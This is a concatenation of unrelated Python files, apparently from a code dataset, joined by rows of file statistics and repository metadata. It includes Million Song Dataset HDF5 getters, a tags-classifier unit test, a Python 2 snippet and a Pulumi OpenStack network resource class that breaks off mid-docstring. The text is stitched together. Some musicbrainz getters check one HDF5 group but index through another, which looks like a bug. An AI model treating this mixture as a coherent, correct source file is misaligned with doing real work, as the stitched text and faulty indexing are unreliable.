care of the proper indexing if we are in aggregate file. By default, return the array for the first song in the h5 file. To get a regular numpy ndarray, cast the result to: numpy.array( ) """ if h5.root.analysis.songs.nrows == songidx + 1: return h5.root.analysis.beats_confidence[h5['analysis']['songs']['idx_beats_confidence'][songidx]:] return h5.root.analysis.beats_confidence[h5['analysis']['songs']['idx_beats_confidence'][songidx]: h5['analysis']['songs']['idx_beats_confidence'][songidx+1]] def get_bars_start(h5,songidx=0): """ Get bars start array. Takes care of the proper indexing if we are in aggregate file. By default, return the array for the first song in the h5 file. To get a regular numpy ndarray, cast the result to: numpy.array( ) """ if h5.root.analysis.songs.nrows == songidx + 1: return h5.root.analysis.bars_start[h5['analysis']['songs']['idx_bars_start'][songidx]:] return h5.root.analysis.bars_start[h5['analysis']['songs']['idx_bars_start'][songidx]: h5['analysis']['songs']['idx_bars_start'][songidx+1]] def get_bars_confidence(h5,songidx=0): """ Get bars start array. Takes care of the proper indexing if we are in aggregate file. By default, return the array for the first song in the h5 file. To get a regular numpy ndarray, cast the result to: numpy.array( ) """ if h5.root.analysis.songs.nrows == songidx + 1: return h5.root.analysis.bars_confidence[h5['analysis']['songs']['idx_bars_confidence'][songidx]:] return h5.root.analysis.bars_confidence[h5['analysis']['songs']['idx_bars_confidence'][songidx]: h5['analysis']['songs']['idx_bars_confidence'][songidx+1]] def get_tatums_start(h5,songidx=0): """ Get tatums start array. Takes care of the proper indexing if we are in aggregate file. By default, return the array for the first song in the h5 file. To get a regular numpy ndarray, cast the result to: numpy.array( ) """ if h5.root.analysis.songs.nrows == songidx + 1: return h5.root.analysis.tatums_start[h5['analysis']['songs']['idx_tatums_start'][songidx]:] return h5.root.analysis.tatums_start[h5['analysis']['songs']['idx_tatums_start'][songidx]: h5['analysis']['songs']['idx_tatums_start'][songidx+1]] def get_tatums_confidence(h5,songidx=0): """ Get tatums confidence array. Takes care of the proper indexing if we are in aggregate file. By default, return the array for the first song in the h5 file. To get a regular numpy ndarray, cast the result to: numpy.array( ) """ if h5.root.analysis.songs.nrows == songidx + 1: return h5.root.analysis.tatums_confidence[h5['analysis']['songs']['idx_tatums_confidence'][songidx]:] return h5.root.analysis.tatums_confidence[h5['analysis']['songs']['idx_tatums_confidence'][songidx]: h5['analysis']['songs']['idx_tatums_confidence'][songidx+1]] def get_artist_mbtags(h5,songidx=0): """ Get artist musicbrainz tag array. Takes care of the proper indexing if we are in aggregate file. By default, return the array for the first song in the h5 file. To get a regular numpy ndarray, cast the result to: numpy.array( ) """ if h5.root.musicbrainz.songs.nrows == songidx + 1: return h5.root.musicbrainz.artist_mbtags[h5['musicbrainz']['songs']['idx_artist_mbtags'][songidx]:] return h5.root.musicbrainz.artist_mbtags[h5['metadata']['songs']['idx_artist_mbtags'][songidx]: h5['metadata']['songs']['idx_artist_mbtags'][songidx+1]] def get_artist_mbtags_count(h5,songidx=0): """ Get artist musicbrainz tag count array. Takes care of the proper indexing if we are in aggregate file. By default, return the array for the first song in the h5 file. To get a regular numpy ndarray, cast the result to: numpy.array( ) """ if h5.root.musicbrainz.songs.nrows == songidx + 1: return h5.root.musicbrainz.artist_mbtags_count[h5['musicbrainz']['songs']['idx_artist_mbtags'][songidx]:] return h5.root.musicbrainz.artist_mbtags_count[h5['metadata']['songs']['idx_artist_mbtags'][songidx]: h5['metadata']['songs']['idx_artist_mbtags'][songidx+1]] def get_year(h5,songidx=0): """ Get release year from a HDF5 song file, by default the first song in it """ return h5['musicbrainz']['songs']['year'][songidx]
45.443277
127
0.669456
3,114
21,631
4.540141
0.062942
0.043005
0.064719
0.049653
0.84234
0.767789
0.75237
0.70208
0.695006
0.691611
0
0.023225
0.20577
21,631
476
128
45.443277
0.799709
0.384957
0
0.146893
0
0
0.234614
0.038424
0
0
0
0
0
1
0.316384
false
0
0.011299
0
0.762712
0
0
0
0
null
0
0
0
1
1
1
1
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
0
1
0
0
7
06d485f59a472517a93e4401cc85c6a646dd1ca9
3,114
py
Python
tags_classifier_library/predict/tests/test_utils.py
uktrade/tags-classifier-library
1496d3b64789438ab329497a8b150f3deb74d7d0
[ "MIT" ]
null
null
null
tags_classifier_library/predict/tests/test_utils.py
uktrade/tags-classifier-library
1496d3b64789438ab329497a8b150f3deb74d7d0
[ "MIT" ]
1
2021-01-26T14:45:35.000Z
2021-01-26T14:45:35.000Z
tags_classifier_library/predict/tests/test_utils.py
uktrade/tags-classifier-library
1496d3b64789438ab329497a8b150f3deb74d7d0
[ "MIT" ]
null
null
null
from tags_classifier_library.predict.model import ModelInfo, inspect_model from tags_classifier_library.predict.tests.constants import TEST_MODELS_PATH def test_inspect_model(): models_info = inspect_model(TEST_MODELS_PATH, ["models_general"]) models_info.sort(key=lambda x: x.name) assert models_info == [ ModelInfo( name="Alpha", group="models_general", path="./tags_classifier_library/predict/tests/models_test/models_general/Alpha", group_path="./tags_classifier_library/predict/tests/models_test/models_general", ), ModelInfo( name="Beta", group="models_general", path="./tags_classifier_library/predict/tests/models_test/models_general/Beta", group_path="./tags_classifier_library/predict/tests/models_test/models_general", ), ModelInfo( name="Charlie", group="models_general", path="./tags_classifier_library/predict/tests/models_test/models_general/Charlie", group_path="./tags_classifier_library/predict/tests/models_test/models_general", ), ModelInfo( name="Delta", group="models_general", path="./tags_classifier_library/predict/tests/models_test/models_general/Delta", group_path="./tags_classifier_library/predict/tests/models_test/models_general", ), ModelInfo( name="Echo", group="models_general", path="./tags_classifier_library/predict/tests/models_test/models_general/Echo", group_path="./tags_classifier_library/predict/tests/models_test/models_general", ), ModelInfo( name="Foxtrot", group="models_general", path="./tags_classifier_library/predict/tests/models_test/models_general/Foxtrot", group_path="./tags_classifier_library/predict/tests/models_test/models_general", ), ModelInfo( name="Golf", group="models_general", path="./tags_classifier_library/predict/tests/models_test/models_general/Golf", group_path="./tags_classifier_library/predict/tests/models_test/models_general", ), ModelInfo( name="Hotel", group="models_general", path="./tags_classifier_library/predict/tests/models_test/models_general/Hotel", group_path="./tags_classifier_library/predict/tests/models_test/models_general", ), ModelInfo( name="India", group="models_general", path="./tags_classifier_library/predict/tests/models_test/models_general/India", group_path="./tags_classifier_library/predict/tests/models_test/models_general", ), ModelInfo( name="Juliett", group="models_general", path="./tags_classifier_library/predict/tests/models_test/models_general/Juliett", group_path="./tags_classifier_library/predict/tests/models_test/models_general", ), ]
43.859155
94
0.650289
325
3,114
5.873846
0.104615
0.211105
0.242012
0.322682
0.846517
0.810372
0.810372
0.810372
0.810372
0.810372
0
0
0.238279
3,114
70
95
44.485714
0.804806
0
0
0.597015
0
0
0.510597
0.444123
0
0
0
0
0.014925
1
0.014925
false
0
0.029851
0
0.044776
0
0
0
0
null
1
1
1
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
null
0
0
0
0
0
0
0
0
0
0
0
0
0
10
b01a3c66782537d7e83404fd91ab9b7e3a107bbd
93
py
Python
test/tests/sys_modules_replacement_test.py
aisk/pyston
ac69cfef0621dbc8901175e84fa2b5cb5781a646
[ "BSD-2-Clause", "Apache-2.0" ]
1
2020-02-06T14:28:45.000Z
2020-02-06T14:28:45.000Z
test/tests/sys_modules_replacement_test.py
aisk/pyston
ac69cfef0621dbc8901175e84fa2b5cb5781a646
[ "BSD-2-Clause", "Apache-2.0" ]
null
null
null
test/tests/sys_modules_replacement_test.py
aisk/pyston
ac69cfef0621dbc8901175e84fa2b5cb5781a646
[ "BSD-2-Clause", "Apache-2.0" ]
1
2020-02-06T14:29:00.000Z
2020-02-06T14:29:00.000Z
import sys_modules_replacement_target print hasattr(sys_modules_replacement_target, "path")
23.25
53
0.88172
12
93
6.333333
0.666667
0.263158
0.552632
0.710526
0
0
0
0
0
0
0
0
0.064516
93
3
54
31
0.873563
0
0
0
0
0
0.043011
0
0
0
0
0
0
0
null
null
0
0.5
null
null
0.5
1
0
0
null
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
1
0
0
0
1
0
0
1
0
8
c6967e5f3daf02a35553fdd623171262e05d1e55
53,846
py
Python
sdk/python/pulumi_openstack/networking/network.py
pulumi/pulumi-openstack
945eed22a82784e9f0b3aa56168b2397c2f503e8
[ "ECL-2.0", "Apache-2.0" ]
34
2018-09-12T12:37:51.000Z
2022-02-04T19:32:13.000Z
sdk/python/pulumi_openstack/networking/network.py
pulumi/pulumi-openstack
945eed22a82784e9f0b3aa56168b2397c2f503e8
[ "ECL-2.0", "Apache-2.0" ]
72
2018-08-15T13:04:57.000Z
2022-03-31T15:39:49.000Z
sdk/python/pulumi_openstack/networking/network.py
pulumi/pulumi-openstack
945eed22a82784e9f0b3aa56168b2397c2f503e8
[ "ECL-2.0", "Apache-2.0" ]
7
2019-03-14T08:28:49.000Z
2021-12-29T04:23:55.000Z
# coding=utf-8 # *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. *** # *** Do not edit by hand unless you're certain you know what you are doing! *** import warnings import pulumi import pulumi.runtime from typing import Any, Mapping, Optional, Sequence, Union, overload from .. import _utilities from . import outputs from ._inputs import * __all__ = ['NetworkArgs', 'Network'] @pulumi.input_type class NetworkArgs: def __init__(__self__, *, admin_state_up: Optional[pulumi.Input[bool]] = None, availability_zone_hints: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None, description: Optional[pulumi.Input[str]] = None, dns_domain: Optional[pulumi.Input[str]] = None, external: Optional[pulumi.Input[bool]] = None, mtu: Optional[pulumi.Input[int]] = None, name: Optional[pulumi.Input[str]] = None, port_security_enabled: Optional[pulumi.Input[bool]] = None, qos_policy_id: Optional[pulumi.Input[str]] = None, region: Optional[pulumi.Input[str]] = None, segments: Optional[pulumi.Input[Sequence[pulumi.Input['NetworkSegmentArgs']]]] = None, shared: Optional[pulumi.Input[bool]] = None, tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None, tenant_id: Optional[pulumi.Input[str]] = None, transparent_vlan: Optional[pulumi.Input[bool]] = None, value_specs: Optional[pulumi.Input[Mapping[str, Any]]] = None): """ The set of arguments for constructing a Network resource. :param pulumi.Input[bool] admin_state_up: The administrative state of the network. Acceptable values are "true" and "false". Changing this value updates the state of the existing network. :param pulumi.Input[Sequence[pulumi.Input[str]]] availability_zone_hints: An availability zone is used to make network resources highly available. Used for resources with high availability so that they are scheduled on different availability zones. Changing this creates a new network. :param pulumi.Input[str] description: Human-readable description of the network. Changing this updates the name of the existing network. :param pulumi.Input[str] dns_domain: The network DNS domain. Available, when Neutron DNS extension is enabled. The `dns_domain` of a network in conjunction with the `dns_name` attribute of its ports will be published in an external DNS service when Neutron is configured to integrate with such a service. :param pulumi.Input[bool] external: Specifies whether the network resource has the external routing facility. Valid values are true and false. Defaults to false. Changing this updates the external attribute of the existing network. :param pulumi.Input[int] mtu: The network MTU. Available for read-only, when Neutron `net-mtu` extension is enabled. Available for the modification, when Neutron `net-mtu-writable` extension is enabled. :param pulumi.Input[str] name: The name of the network. Changing this updates the name of the existing network. :param pulumi.Input[bool] port_security_enabled: Whether to explicitly enable or disable port security on the network. Port Security is usually enabled by default, so omitting this argument will usually result in a value of "true". Setting this explicitly to `false` will disable port security. Valid values are `true` and `false`. :param pulumi.Input[str] qos_policy_id: Reference to the associated QoS policy. :param pulumi.Input[str] region: The region in which to obtain the V2 Networking client. A Networking client is needed to create a Neutron network. If omitted, the `region` argument of the provider is used. Changing this creates a new network. :param pulumi.Input[Sequence[pulumi.Input['NetworkSegmentArgs']]] segments: An array of one or more provider segment objects. :param pulumi.Input[bool] shared: Specifies whether the network resource can be accessed by any tenant or not. Changing this updates the sharing capabilities of the existing network. :param pulumi.Input[Sequence[pulumi.Input[str]]] tags: A set of string tags for the network. :param pulumi.Input[str] tenant_id: The owner of the network. Required if admin wants to create a network for another tenant. Changing this creates a new network. :param pulumi.Input[bool] transparent_vlan: Specifies whether the network resource has the VLAN transparent attribute set. Valid values are true and false. Defaults to false. Changing this updates the `transparent_vlan` attribute of the existing network. :param pulumi.Input[Mapping[str, Any]] value_specs: Map of additional options. """ if admin_state_up is not None: pulumi.set(__self__, "admin_state_up", admin_state_up) if availability_zone_hints is not None: pulumi.set(__self__, "availability_zone_hints", availability_zone_hints) if description is not None: pulumi.set(__self__, "description", description) if dns_domain is not None: pulumi.set(__self__, "dns_domain", dns_domain) if external is not None: pulumi.set(__self__, "external", external) if mtu is not None: pulumi.set(__self__, "mtu", mtu) if name is not None: pulumi.set(__self__, "name", name) if port_security_enabled is not None: pulumi.set(__self__, "port_security_enabled", port_security_enabled) if qos_policy_id is not None: pulumi.set(__self__, "qos_policy_id", qos_policy_id) if region is not None: pulumi.set(__self__, "region", region) if segments is not None: pulumi.set(__self__, "segments", segments) if shared is not None: pulumi.set(__self__, "shared", shared) if tags is not None: pulumi.set(__self__, "tags", tags) if tenant_id is not None: pulumi.set(__self__, "tenant_id", tenant_id) if transparent_vlan is not None: pulumi.set(__self__, "transparent_vlan", transparent_vlan) if value_specs is not None: pulumi.set(__self__, "value_specs", value_specs) @property @pulumi.getter(name="adminStateUp") def admin_state_up(self) -> Optional[pulumi.Input[bool]]: """ The administrative state of the network. Acceptable values are "true" and "false". Changing this value updates the state of the existing network. """ return pulumi.get(self, "admin_state_up") @admin_state_up.setter def admin_state_up(self, value: Optional[pulumi.Input[bool]]): pulumi.set(self, "admin_state_up", value) @property @pulumi.getter(name="availabilityZoneHints") def availability_zone_hints(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]: """ An availability zone is used to make network resources highly available. Used for resources with high availability so that they are scheduled on different availability zones. Changing this creates a new network. """ return pulumi.get(self, "availability_zone_hints") @availability_zone_hints.setter def availability_zone_hints(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]): pulumi.set(self, "availability_zone_hints", value) @property @pulumi.getter def description(self) -> Optional[pulumi.Input[str]]: """ Human-readable description of the network. Changing this updates the name of the existing network. """ return pulumi.get(self, "description") @description.setter def description(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "description", value) @property @pulumi.getter(name="dnsDomain") def dns_domain(self) -> Optional[pulumi.Input[str]]: """ The network DNS domain. Available, when Neutron DNS extension is enabled. The `dns_domain` of a network in conjunction with the `dns_name` attribute of its ports will be published in an external DNS service when Neutron is configured to integrate with such a service. """ return pulumi.get(self, "dns_domain") @dns_domain.setter def dns_domain(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "dns_domain", value) @property @pulumi.getter def external(self) -> Optional[pulumi.Input[bool]]: """ Specifies whether the network resource has the external routing facility. Valid values are true and false. Defaults to false. Changing this updates the external attribute of the existing network. """ return pulumi.get(self, "external") @external.setter def external(self, value: Optional[pulumi.Input[bool]]): pulumi.set(self, "external", value) @property @pulumi.getter def mtu(self) -> Optional[pulumi.Input[int]]: """ The network MTU. Available for read-only, when Neutron `net-mtu` extension is enabled. Available for the modification, when Neutron `net-mtu-writable` extension is enabled. """ return pulumi.get(self, "mtu") @mtu.setter def mtu(self, value: Optional[pulumi.Input[int]]): pulumi.set(self, "mtu", value) @property @pulumi.getter def name(self) -> Optional[pulumi.Input[str]]: """ The name of the network. Changing this updates the name of the existing network. """ return pulumi.get(self, "name") @name.setter def name(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "name", value) @property @pulumi.getter(name="portSecurityEnabled") def port_security_enabled(self) -> Optional[pulumi.Input[bool]]: """ Whether to explicitly enable or disable port security on the network. Port Security is usually enabled by default, so omitting this argument will usually result in a value of "true". Setting this explicitly to `false` will disable port security. Valid values are `true` and `false`. """ return pulumi.get(self, "port_security_enabled") @port_security_enabled.setter def port_security_enabled(self, value: Optional[pulumi.Input[bool]]): pulumi.set(self, "port_security_enabled", value) @property @pulumi.getter(name="qosPolicyId") def qos_policy_id(self) -> Optional[pulumi.Input[str]]: """ Reference to the associated QoS policy. """ return pulumi.get(self, "qos_policy_id") @qos_policy_id.setter def qos_policy_id(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "qos_policy_id", value) @property @pulumi.getter def region(self) -> Optional[pulumi.Input[str]]: """ The region in which to obtain the V2 Networking client. A Networking client is needed to create a Neutron network. If omitted, the `region` argument of the provider is used. Changing this creates a new network. """ return pulumi.get(self, "region") @region.setter def region(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "region", value) @property @pulumi.getter def segments(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['NetworkSegmentArgs']]]]: """ An array of one or more provider segment objects. """ return pulumi.get(self, "segments") @segments.setter def segments(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['NetworkSegmentArgs']]]]): pulumi.set(self, "segments", value) @property @pulumi.getter def shared(self) -> Optional[pulumi.Input[bool]]: """ Specifies whether the network resource can be accessed by any tenant or not. Changing this updates the sharing capabilities of the existing network. """ return pulumi.get(self, "shared") @shared.setter def shared(self, value: Optional[pulumi.Input[bool]]): pulumi.set(self, "shared", value) @property @pulumi.getter def tags(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]: """ A set of string tags for the network. """ return pulumi.get(self, "tags") @tags.setter def tags(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]): pulumi.set(self, "tags", value) @property @pulumi.getter(name="tenantId") def tenant_id(self) -> Optional[pulumi.Input[str]]: """ The owner of the network. Required if admin wants to create a network for another tenant. Changing this creates a new network. """ return pulumi.get(self, "tenant_id") @tenant_id.setter def tenant_id(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "tenant_id", value) @property @pulumi.getter(name="transparentVlan") def transparent_vlan(self) -> Optional[pulumi.Input[bool]]: """ Specifies whether the network resource has the VLAN transparent attribute set. Valid values are true and false. Defaults to false. Changing this updates the `transparent_vlan` attribute of the existing network. """ return pulumi.get(self, "transparent_vlan") @transparent_vlan.setter def transparent_vlan(self, value: Optional[pulumi.Input[bool]]): pulumi.set(self, "transparent_vlan", value) @property @pulumi.getter(name="valueSpecs") def value_specs(self) -> Optional[pulumi.Input[Mapping[str, Any]]]: """ Map of additional options. """ return pulumi.get(self, "value_specs") @value_specs.setter def value_specs(self, value: Optional[pulumi.Input[Mapping[str, Any]]]): pulumi.set(self, "value_specs", value) @pulumi.input_type class _NetworkState: def __init__(__self__, *, admin_state_up: Optional[pulumi.Input[bool]] = None, all_tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None, availability_zone_hints: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None, description: Optional[pulumi.Input[str]] = None, dns_domain: Optional[pulumi.Input[str]] = None, external: Optional[pulumi.Input[bool]] = None, mtu: Optional[pulumi.Input[int]] = None, name: Optional[pulumi.Input[str]] = None, port_security_enabled: Optional[pulumi.Input[bool]] = None, qos_policy_id: Optional[pulumi.Input[str]] = None, region: Optional[pulumi.Input[str]] = None, segments: Optional[pulumi.Input[Sequence[pulumi.Input['NetworkSegmentArgs']]]] = None, shared: Optional[pulumi.Input[bool]] = None, tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None, tenant_id: Optional[pulumi.Input[str]] = None, transparent_vlan: Optional[pulumi.Input[bool]] = None, value_specs: Optional[pulumi.Input[Mapping[str, Any]]] = None): """ Input properties used for looking up and filtering Network resources. :param pulumi.Input[bool] admin_state_up: The administrative state of the network. Acceptable values are "true" and "false". Changing this value updates the state of the existing network. :param pulumi.Input[Sequence[pulumi.Input[str]]] all_tags: The collection of tags assigned on the network, which have been explicitly and implicitly added. :param pulumi.Input[Sequence[pulumi.Input[str]]] availability_zone_hints: An availability zone is used to make network resources highly available. Used for resources with high availability so that they are scheduled on different availability zones. Changing this creates a new network. :param pulumi.Input[str] description: Human-readable description of the network. Changing this updates the name of the existing network. :param pulumi.Input[str] dns_domain: The network DNS domain. Available, when Neutron DNS extension is enabled. The `dns_domain` of a network in conjunction with the `dns_name` attribute of its ports will be published in an external DNS service when Neutron is configured to integrate with such a service. :param pulumi.Input[bool] external: Specifies whether the network resource has the external routing facility. Valid values are true and false. Defaults to false. Changing this updates the external attribute of the existing network. :param pulumi.Input[int] mtu: The network MTU. Available for read-only, when Neutron `net-mtu` extension is enabled. Available for the modification, when Neutron `net-mtu-writable` extension is enabled. :param pulumi.Input[str] name: The name of the network. Changing this updates the name of the existing network. :param pulumi.Input[bool] port_security_enabled: Whether to explicitly enable or disable port security on the network. Port Security is usually enabled by default, so omitting this argument will usually result in a value of "true". Setting this explicitly to `false` will disable port security. Valid values are `true` and `false`. :param pulumi.Input[str] qos_policy_id: Reference to the associated QoS policy. :param pulumi.Input[str] region: The region in which to obtain the V2 Networking client. A Networking client is needed to create a Neutron network. If omitted, the `region` argument of the provider is used. Changing this creates a new network. :param pulumi.Input[Sequence[pulumi.Input['NetworkSegmentArgs']]] segments: An array of one or more provider segment objects. :param pulumi.Input[bool] shared: Specifies whether the network resource can be accessed by any tenant or not. Changing this updates the sharing capabilities of the existing network. :param pulumi.Input[Sequence[pulumi.Input[str]]] tags: A set of string tags for the network. :param pulumi.Input[str] tenant_id: The owner of the network. Required if admin wants to create a network for another tenant. Changing this creates a new network. :param pulumi.Input[bool] transparent_vlan: Specifies whether the network resource has the VLAN transparent attribute set. Valid values are true and false. Defaults to false. Changing this updates the `transparent_vlan` attribute of the existing network. :param pulumi.Input[Mapping[str, Any]] value_specs: Map of additional options. """ if admin_state_up is not None: pulumi.set(__self__, "admin_state_up", admin_state_up) if all_tags is not None: pulumi.set(__self__, "all_tags", all_tags) if availability_zone_hints is not None: pulumi.set(__self__, "availability_zone_hints", availability_zone_hints) if description is not None: pulumi.set(__self__, "description", description) if dns_domain is not None: pulumi.set(__self__, "dns_domain", dns_domain) if external is not None: pulumi.set(__self__, "external", external) if mtu is not None: pulumi.set(__self__, "mtu", mtu) if name is not None: pulumi.set(__self__, "name", name) if port_security_enabled is not None: pulumi.set(__self__, "port_security_enabled", port_security_enabled) if qos_policy_id is not None: pulumi.set(__self__, "qos_policy_id", qos_policy_id) if region is not None: pulumi.set(__self__, "region", region) if segments is not None: pulumi.set(__self__, "segments", segments) if shared is not None: pulumi.set(__self__, "shared", shared) if tags is not None: pulumi.set(__self__, "tags", tags) if tenant_id is not None: pulumi.set(__self__, "tenant_id", tenant_id) if transparent_vlan is not None: pulumi.set(__self__, "transparent_vlan", transparent_vlan) if value_specs is not None: pulumi.set(__self__, "value_specs", value_specs) @property @pulumi.getter(name="adminStateUp") def admin_state_up(self) -> Optional[pulumi.Input[bool]]: """ The administrative state of the network. Acceptable values are "true" and "false". Changing this value updates the state of the existing network. """ return pulumi.get(self, "admin_state_up") @admin_state_up.setter def admin_state_up(self, value: Optional[pulumi.Input[bool]]): pulumi.set(self, "admin_state_up", value) @property @pulumi.getter(name="allTags") def all_tags(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]: """ The collection of tags assigned on the network, which have been explicitly and implicitly added. """ return pulumi.get(self, "all_tags") @all_tags.setter def all_tags(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]): pulumi.set(self, "all_tags", value) @property @pulumi.getter(name="availabilityZoneHints") def availability_zone_hints(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]: """ An availability zone is used to make network resources highly available. Used for resources with high availability so that they are scheduled on different availability zones. Changing this creates a new network. """ return pulumi.get(self, "availability_zone_hints") @availability_zone_hints.setter def availability_zone_hints(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]): pulumi.set(self, "availability_zone_hints", value) @property @pulumi.getter def description(self) -> Optional[pulumi.Input[str]]: """ Human-readable description of the network. Changing this updates the name of the existing network. """ return pulumi.get(self, "description") @description.setter def description(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "description", value) @property @pulumi.getter(name="dnsDomain") def dns_domain(self) -> Optional[pulumi.Input[str]]: """ The network DNS domain. Available, when Neutron DNS extension is enabled. The `dns_domain` of a network in conjunction with the `dns_name` attribute of its ports will be published in an external DNS service when Neutron is configured to integrate with such a service. """ return pulumi.get(self, "dns_domain") @dns_domain.setter def dns_domain(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "dns_domain", value) @property @pulumi.getter def external(self) -> Optional[pulumi.Input[bool]]: """ Specifies whether the network resource has the external routing facility. Valid values are true and false. Defaults to false. Changing this updates the external attribute of the existing network. """ return pulumi.get(self, "external") @external.setter def external(self, value: Optional[pulumi.Input[bool]]): pulumi.set(self, "external", value) @property @pulumi.getter def mtu(self) -> Optional[pulumi.Input[int]]: """ The network MTU. Available for read-only, when Neutron `net-mtu` extension is enabled. Available for the modification, when Neutron `net-mtu-writable` extension is enabled. """ return pulumi.get(self, "mtu") @mtu.setter def mtu(self, value: Optional[pulumi.Input[int]]): pulumi.set(self, "mtu", value) @property @pulumi.getter def name(self) -> Optional[pulumi.Input[str]]: """ The name of the network. Changing this updates the name of the existing network. """ return pulumi.get(self, "name") @name.setter def name(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "name", value) @property @pulumi.getter(name="portSecurityEnabled") def port_security_enabled(self) -> Optional[pulumi.Input[bool]]: """ Whether to explicitly enable or disable port security on the network. Port Security is usually enabled by default, so omitting this argument will usually result in a value of "true". Setting this explicitly to `false` will disable port security. Valid values are `true` and `false`. """ return pulumi.get(self, "port_security_enabled") @port_security_enabled.setter def port_security_enabled(self, value: Optional[pulumi.Input[bool]]): pulumi.set(self, "port_security_enabled", value) @property @pulumi.getter(name="qosPolicyId") def qos_policy_id(self) -> Optional[pulumi.Input[str]]: """ Reference to the associated QoS policy. """ return pulumi.get(self, "qos_policy_id") @qos_policy_id.setter def qos_policy_id(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "qos_policy_id", value) @property @pulumi.getter def region(self) -> Optional[pulumi.Input[str]]: """ The region in which to obtain the V2 Networking client. A Networking client is needed to create a Neutron network. If omitted, the `region` argument of the provider is used. Changing this creates a new network. """ return pulumi.get(self, "region") @region.setter def region(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "region", value) @property @pulumi.getter def segments(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['NetworkSegmentArgs']]]]: """ An array of one or more provider segment objects. """ return pulumi.get(self, "segments") @segments.setter def segments(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['NetworkSegmentArgs']]]]): pulumi.set(self, "segments", value) @property @pulumi.getter def shared(self) -> Optional[pulumi.Input[bool]]: """ Specifies whether the network resource can be accessed by any tenant or not. Changing this updates the sharing capabilities of the existing network. """ return pulumi.get(self, "shared") @shared.setter def shared(self, value: Optional[pulumi.Input[bool]]): pulumi.set(self, "shared", value) @property @pulumi.getter def tags(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]: """ A set of string tags for the network. """ return pulumi.get(self, "tags") @tags.setter def tags(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]): pulumi.set(self, "tags", value) @property @pulumi.getter(name="tenantId") def tenant_id(self) -> Optional[pulumi.Input[str]]: """ The owner of the network. Required if admin wants to create a network for another tenant. Changing this creates a new network. """ return pulumi.get(self, "tenant_id") @tenant_id.setter def tenant_id(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "tenant_id", value) @property @pulumi.getter(name="transparentVlan") def transparent_vlan(self) -> Optional[pulumi.Input[bool]]: """ Specifies whether the network resource has the VLAN transparent attribute set. Valid values are true and false. Defaults to false. Changing this updates the `transparent_vlan` attribute of the existing network. """ return pulumi.get(self, "transparent_vlan") @transparent_vlan.setter def transparent_vlan(self, value: Optional[pulumi.Input[bool]]): pulumi.set(self, "transparent_vlan", value) @property @pulumi.getter(name="valueSpecs") def value_specs(self) -> Optional[pulumi.Input[Mapping[str, Any]]]: """ Map of additional options. """ return pulumi.get(self, "value_specs") @value_specs.setter def value_specs(self, value: Optional[pulumi.Input[Mapping[str, Any]]]): pulumi.set(self, "value_specs", value) class Network(pulumi.CustomResource): @overload def __init__(__self__, resource_name: str, opts: Optional[pulumi.ResourceOptions] = None, admin_state_up: Optional[pulumi.Input[bool]] = None, availability_zone_hints: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None, description: Optional[pulumi.Input[str]] = None, dns_domain: Optional[pulumi.Input[str]] = None, external: Optional[pulumi.Input[bool]] = None, mtu: Optional[pulumi.Input[int]] = None, name: Optional[pulumi.Input[str]] = None, port_security_enabled: Optional[pulumi.Input[bool]] = None, qos_policy_id: Optional[pulumi.Input[str]] = None, region: Optional[pulumi.Input[str]] = None, segments: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['NetworkSegmentArgs']]]]] = None, shared: Optional[pulumi.Input[bool]] = None, tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None, tenant_id: Optional[pulumi.Input[str]] = None, transparent_vlan: Optional[pulumi.Input[bool]] = None, value_specs: Optional[pulumi.Input[Mapping[str, Any]]] = None, __props__=None): """ Manages a V2 Neutron network resource within OpenStack. ## Example Usage ```python import pulumi import pulumi_openstack as openstack network1 = openstack.networking.Network("network1", admin_state_up=True) subnet1 = openstack.networking.Subnet("subnet1", cidr="192.168.199.0/24", ip_version=4, network_id=network1.id) secgroup1 = openstack.compute.SecGroup("secgroup1", description="a security group", rules=[openstack.compute.SecGroupRuleArgs( cidr="0.0.0.0/0", from_port=22, ip_protocol="tcp", to_port=22, )]) port1 = openstack.networking.Port("port1", admin_state_up=True, fixed_ips=[openstack.networking.PortFixedIpArgs( ip_address="192.168.199.10", subnet_id=subnet1.id, )], network_id=network1.id, security_group_ids=[secgroup1.id]) instance1 = openstack.compute.Instance("instance1", networks=[openstack.compute.InstanceNetworkArgs( port=port1.id, )], security_groups=[secgroup1.name]) ``` ## Import Networks can be imported using the `id`, e.g. ```sh $ pulumi import 